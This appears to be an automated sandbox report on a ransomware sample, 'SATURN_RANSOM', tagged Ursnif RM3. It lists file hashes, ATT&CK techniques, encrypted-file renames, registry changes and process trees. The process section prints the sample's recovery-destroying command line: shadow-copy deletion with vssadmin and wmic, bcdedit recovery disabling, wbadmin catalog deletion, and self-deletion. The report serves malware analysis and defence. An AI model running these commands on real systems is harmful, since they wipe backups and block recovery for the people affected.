ursnif_rm3 | b8594ea62b588184f05048607c66ee5ea865673f0cf7e49af7a01c10480c09b9

General

Target

SATURN_RANSOM.bin.exe
Size

338KB
MD5

bbd4c2d2c72648c8f871b36261be23fd
SHA1

77c525e6b8a5760823ad6036e60b3fa244db8e42
SHA256

9e87f069de22ceac029a4ac56e6305d2df54227e6b0f0b3ecad52a01fbade021
SHA512

38f2ff3b7ff6faa63ef0a3200e0dbb9e48e1d404a065f6919cb6d245699479896a42316f299c33c8cc068922934c64f8aa06c88b000d1676870c1d0c0f18e14a

Score

10^/10

ursnif_rm3 banker evasion persistence ransomware spyware trojan

Malware Config

Signatures

Ursnif RM3
A heavily modified version of Ursnif discovered in the wild.
banker trojan ursnif_rm3
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Enumerates VirtualBox registry keys 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Looks for VirtualBox Guest Additions in registry 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Modifies extensions of user files 20 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

SATURN_RANSOM.bin.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\UnlockResolve.tif => C:\Users\Admin\Pictures\UnlockResolve.tif.saturn	SATURN_RANSOM.bin.exe
File renamed	C:\Users\Admin\Pictures\DebugTest.tiff.5rg3 => C:\Users\Admin\Pictures\DebugTest.tiff	SATURN_RANSOM.bin.exe
File opened for modification	C:\Users\Admin\Pictures\HideNew.png.5rg3	SATURN_RANSOM.bin.exe
File renamed	C:\Users\Admin\Pictures\ReceiveRedo.tif => C:\Users\Admin\Pictures\ReceiveRedo.tif.saturn	SATURN_RANSOM.bin.exe
File created	C:\Users\Admin\Pictures\RemoveMount.png.5rg3	SATURN_RANSOM.bin.exe
File created	C:\Users\Admin\Pictures\ConnectUninstall.tif.5rg3	SATURN_RANSOM.bin.exe
File renamed	C:\Users\Admin\Pictures\DebugTest.tiff => C:\Users\Admin\Pictures\DebugTest.tiff.saturn	SATURN_RANSOM.bin.exe
File created	C:\Users\Admin\Pictures\UnlockResolve.tif.5rg3	SATURN_RANSOM.bin.exe
File renamed	C:\Users\Admin\Pictures\HideNew.png => C:\Users\Admin\Pictures\HideNew.png.saturn	SATURN_RANSOM.bin.exe
File created	C:\Users\Admin\Pictures\ReceiveRedo.tif.5rg3	SATURN_RANSOM.bin.exe
File opened for modification	C:\Users\Admin\Pictures\RemoveMount.png.5rg3	SATURN_RANSOM.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ConnectUninstall.tif.5rg3	SATURN_RANSOM.bin.exe
File renamed	C:\Users\Admin\Pictures\ConnectUninstall.tif => C:\Users\Admin\Pictures\ConnectUninstall.tif.saturn	SATURN_RANSOM.bin.exe
File created	C:\Users\Admin\Pictures\DebugTest.tiff.5rg3	SATURN_RANSOM.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DebugTest.tiff	SATURN_RANSOM.bin.exe
File opened for modification	C:\Users\Admin\Pictures\UnlockResolve.tif.5rg3	SATURN_RANSOM.bin.exe
File opened for modification	C:\Users\Admin\Pictures\DebugTest.tiff.5rg3	SATURN_RANSOM.bin.exe
File created	C:\Users\Admin\Pictures\HideNew.png.5rg3	SATURN_RANSOM.bin.exe
File opened for modification	C:\Users\Admin\Pictures\ReceiveRedo.tif.5rg3	SATURN_RANSOM.bin.exe
File renamed	C:\Users\Admin\Pictures\RemoveMount.png => C:\Users\Admin\Pictures\RemoveMount.png.saturn	SATURN_RANSOM.bin.exe

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

SATURN_RANSOM.bin.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SATURN_RANSOM.bin.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1388 cmd.exe
Drops startup file 1 IoCs

Processes:

SATURN_RANSOM.bin.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5zy4hsui.lnk SATURN_RANSOM.bin.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SATURN_RANSOM.bin.exe

pid	process
1388	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5zy4hsui.lnk	SATURN_RANSOM.bin.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

SATURN_RANSOM.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\#DECRYPT_MY_FILES.BMP"	SATURN_RANSOM.bin.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\Wallpaper.jpg"	SATURN_RANSOM.bin.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1980 vssadmin.exe

pid	process
1980	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a6000000000020000000000106600000001000020000000fd908d0de316cab43e2be417fd42956d17bd93a295223d74659bb7359935d7b1000000000e80000000020000200000007e19a25e1298d66f931634bf82cc3425d33544432bb9174689391768e28d9ffd900000001a34dd7f6ca0d407771e5c7df4eb0e0dec2a9a37f8af664d6951d6a5068a7fe3f8970adfa29feb36694a3596f6cd72d0dd5a282010be60c1c64d5ef678ae39e5b5b1c8e8b4ac0ee9cc2c0439db81757389cce564b6ab63aa40756e9a069d151885d089325456971ca46fdae1e11770a2e134593f538813107f8b4d0b7af69a430c1ace55c733cb03209339cd61173a90400000007a01aa61717ddac7da1009a6a624ac48c7b4b1d98384dc4c3c28b413f43b5e210dcece1437a34503b0bfd988aa68906773d0c94cfda633625b1fad1337a847bd	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 609a43c553b2d601	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "311222536"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000039e08b06c84715459283081ff7bb5a60000000000200000000001066000000010000200000008aa9d8af6ed03d7df5486f02a2a489bae03bea51ca5d51e9f59640ff41735252000000000e80000000020000200000001ba05b83bb454e867d1f422b62003c91f7de2e3c82e16ed63b8e4fba3b4901b5200000001c704e03b25014b373a71ea83a53142215c90d96ad49f2068ea3b4f7039984d9400000007628fb0a5217d26a4513da4ad7c60ec2f20983e1a51b20eee6500305e53a4f1e1a712f93afab7b5911e50d921a6d9a3c25e0da1ce123f31d9605602dec6bb4c1	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EF781D31-1E46-11EB-A10A-5A5B5EF0CC06} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1632 PING.EXE

pid	process
1632	PING.EXE

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

vssvc.exeWMIC.exe

description	pid	process
Token: SeBackupPrivilege	1780	vssvc.exe
Token: SeRestorePrivilege	1780	vssvc.exe
Token: SeAuditPrivilege	1780	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1776	WMIC.exe
Token: SeSecurityPrivilege	1776	WMIC.exe
Token: SeTakeOwnershipPrivilege	1776	WMIC.exe
Token: SeLoadDriverPrivilege	1776	WMIC.exe
Token: SeSystemProfilePrivilege	1776	WMIC.exe
Token: SeSystemtimePrivilege	1776	WMIC.exe
Token: SeProfSingleProcessPrivilege	1776	WMIC.exe
Token: SeIncBasePriorityPrivilege	1776	WMIC.exe
Token: SeCreatePagefilePrivilege	1776	WMIC.exe
Token: SeBackupPrivilege	1776	WMIC.exe
Token: SeRestorePrivilege	1776	WMIC.exe
Token: SeShutdownPrivilege	1776	WMIC.exe
Token: SeDebugPrivilege	1776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1776	WMIC.exe
Token: SeRemoteShutdownPrivilege	1776	WMIC.exe
Token: SeUndockPrivilege	1776	WMIC.exe
Token: SeManageVolumePrivilege	1776	WMIC.exe
Token: 33	1776	WMIC.exe
Token: 34	1776	WMIC.exe
Token: 35	1776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1776	WMIC.exe
Token: SeSecurityPrivilege	1776	WMIC.exe
Token: SeTakeOwnershipPrivilege	1776	WMIC.exe
Token: SeLoadDriverPrivilege	1776	WMIC.exe
Token: SeSystemProfilePrivilege	1776	WMIC.exe
Token: SeSystemtimePrivilege	1776	WMIC.exe
Token: SeProfSingleProcessPrivilege	1776	WMIC.exe
Token: SeIncBasePriorityPrivilege	1776	WMIC.exe
Token: SeCreatePagefilePrivilege	1776	WMIC.exe
Token: SeBackupPrivilege	1776	WMIC.exe
Token: SeRestorePrivilege	1776	WMIC.exe
Token: SeShutdownPrivilege	1776	WMIC.exe
Token: SeDebugPrivilege	1776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1776	WMIC.exe
Token: SeRemoteShutdownPrivilege	1776	WMIC.exe
Token: SeUndockPrivilege	1776	WMIC.exe
Token: SeManageVolumePrivilege	1776	WMIC.exe
Token: 33	1776	WMIC.exe
Token: 34	1776	WMIC.exe
Token: 35	1776	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1592 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1592 iexplore.exe
1592 iexplore.exe
1752 IEXPLORE.EXE
1752 IEXPLORE.EXE
1752 IEXPLORE.EXE
1752 IEXPLORE.EXE

pid	process
1592	iexplore.exe

pid	process
1592	iexplore.exe
1592	iexplore.exe
1752	IEXPLORE.EXE
1752	IEXPLORE.EXE
1752	IEXPLORE.EXE
1752	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

SATURN_RANSOM.bin.execmd.execmd.exeiexplore.exe

description	pid	process	target process
PID 1756 wrote to memory of 1092	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1756 wrote to memory of 1092	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1756 wrote to memory of 1092	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1756 wrote to memory of 1092	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1092 wrote to memory of 1980	1092	cmd.exe	vssadmin.exe
PID 1092 wrote to memory of 1980	1092	cmd.exe	vssadmin.exe
PID 1092 wrote to memory of 1980	1092	cmd.exe	vssadmin.exe
PID 1092 wrote to memory of 1980	1092	cmd.exe	vssadmin.exe
PID 1092 wrote to memory of 1776	1092	cmd.exe	WMIC.exe
PID 1092 wrote to memory of 1776	1092	cmd.exe	WMIC.exe
PID 1092 wrote to memory of 1776	1092	cmd.exe	WMIC.exe
PID 1092 wrote to memory of 1776	1092	cmd.exe	WMIC.exe
PID 1756 wrote to memory of 440	1756	SATURN_RANSOM.bin.exe	NOTEPAD.EXE
PID 1756 wrote to memory of 440	1756	SATURN_RANSOM.bin.exe	NOTEPAD.EXE
PID 1756 wrote to memory of 440	1756	SATURN_RANSOM.bin.exe	NOTEPAD.EXE
PID 1756 wrote to memory of 440	1756	SATURN_RANSOM.bin.exe	NOTEPAD.EXE
PID 1756 wrote to memory of 1136	1756	SATURN_RANSOM.bin.exe	WScript.exe
PID 1756 wrote to memory of 1136	1756	SATURN_RANSOM.bin.exe	WScript.exe
PID 1756 wrote to memory of 1136	1756	SATURN_RANSOM.bin.exe	WScript.exe
PID 1756 wrote to memory of 1136	1756	SATURN_RANSOM.bin.exe	WScript.exe
PID 1756 wrote to memory of 1592	1756	SATURN_RANSOM.bin.exe	iexplore.exe
PID 1756 wrote to memory of 1592	1756	SATURN_RANSOM.bin.exe	iexplore.exe
PID 1756 wrote to memory of 1592	1756	SATURN_RANSOM.bin.exe	iexplore.exe
PID 1756 wrote to memory of 1592	1756	SATURN_RANSOM.bin.exe	iexplore.exe
PID 1756 wrote to memory of 1388	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1756 wrote to memory of 1388	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1756 wrote to memory of 1388	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1756 wrote to memory of 1388	1756	SATURN_RANSOM.bin.exe	cmd.exe
PID 1388 wrote to memory of 1632	1388	cmd.exe	PING.EXE
PID 1388 wrote to memory of 1632	1388	cmd.exe	PING.EXE
PID 1388 wrote to memory of 1632	1388	cmd.exe	PING.EXE
PID 1388 wrote to memory of 1632	1388	cmd.exe	PING.EXE
PID 1592 wrote to memory of 1752	1592	iexplore.exe	IEXPLORE.EXE
PID 1592 wrote to memory of 1752	1592	iexplore.exe	IEXPLORE.EXE
PID 1592 wrote to memory of 1752	1592	iexplore.exe	IEXPLORE.EXE
PID 1592 wrote to memory of 1752	1592	iexplore.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\SATURN_RANSOM.bin.exe
"C:\Users\Admin\AppData\Local\Temp\SATURN_RANSOM.bin.exe"
1⤵
- Modifies extensions of user files
- Checks BIOS information in registry
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin.exe delete shadows /all /quiet & wmic.exe shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
2⤵
- Suspicious use of WriteProcessMemory
PID:1092

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1980

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic.exe shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1776

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.txt
2⤵
PID:440

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.vbs"
2⤵
PID:1136

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.html
2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1592

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1592 CREDAT:275457 /prefetch:2
3⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1752

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\SATURN_RANSOM.bin.exe"
2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1388

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
3⤵
- Runs ping.exe
PID:1632

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:1676

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

File Deletion

Modify Registry

Virtualization/Sandbox Evasion

2

T1497

Credential Access

Credentials in Files

1

T1081

Discovery

Query Registry

3

T1012

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Virtualization/Sandbox Evasion

2

T1497

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\QQB5J2V0.txt

MD5
cf9fbd8d0b51028171dee729653b6abf

SHA1
fe0e1efd2d39d9cb858e3dbf4ad15bbb13ea34ed

SHA256
56fc934e8983bbc00592f81f9950b3e403d3e653dd0652594681ae784ed5d6e6

SHA512
12fd16e7ba7f8a72ed781e00a0538d405a1a173b737cda860edce864c31dd12badf9ff1877be0e310ab698e15ddeecbb2e1eb1b1e08357c2479772e810da4821

Download Submit
C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.html

MD5
81a5c46ac3078e69ee370e929c738602

SHA1
404c83c60bf8c5c711be2e99286549c55fed3368

SHA256
d6e6ad1b9a348ccab1255ccd894394aec921aa4ecbef55dec17cacdd8c5cd212

SHA512
5850a41591a39a84360db47992e360a4f618a28e949e49576cbe10bc624110665d3b1c14f0cfeb9197f567d10cbbe0cedaa9a9a9c281c426b9733f1e9a0614d0

Download Submit
C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.txt

MD5
f3d19c544c10a8337a7d9f7aef079a43

SHA1
252612bbdbdbe790853fe560ce5ce8e1df5fcdc5

SHA256
b660c9236f4d6d9b62eb04b40599e852f979dd3dbfd1d03e545a287fe8e5d32b

SHA512
c5cd69e7134f6d587d0823f6e7f9e5ba6affd75f5398fcea96e299dfb57996234ba87abe4632b2de807a4b79bbafd1b1132ae55b18a815eb8c4112b48942fb1b

Download Submit
C:\Users\Admin\Desktop\#DECRYPT_MY_FILES#.vbs

MD5
23e0e8c821b40253c04d561a6d06e253

SHA1
5df1808c8485ad1d90f1431adfa2694dbb1ed693

SHA256
54905816b33af2b53b2e127e0a7db664d126700b3fdd360894b9d924544f639a

SHA512
87a57f1615db68d57381b1a8602c92e57e3a8bf447ed842f410e50efd13a7f7ba44998b00d5e54238f09cad24ffe59c3aa788c1390364c465c761f3da6a688e8

Download Submit
memory/440-3-0x0000000000000000-mapping.dmp

Download
memory/1092-0-0x0000000000000000-mapping.dmp

Download
memory/1136-4-0x0000000000000000-mapping.dmp

Download
memory/1388-8-0x0000000000000000-mapping.dmp

Download
memory/1592-5-0x0000000000000000-mapping.dmp

Download
memory/1632-9-0x0000000000000000-mapping.dmp

Download
memory/1752-11-0x0000000000000000-mapping.dmp

Download
memory/1776-2-0x0000000000000000-mapping.dmp

Download
memory/1948-10-0x000007FEF6790000-0x000007FEF6A0A000-memory.dmp

Filesize
2.5MB

Download
memory/1980-1-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads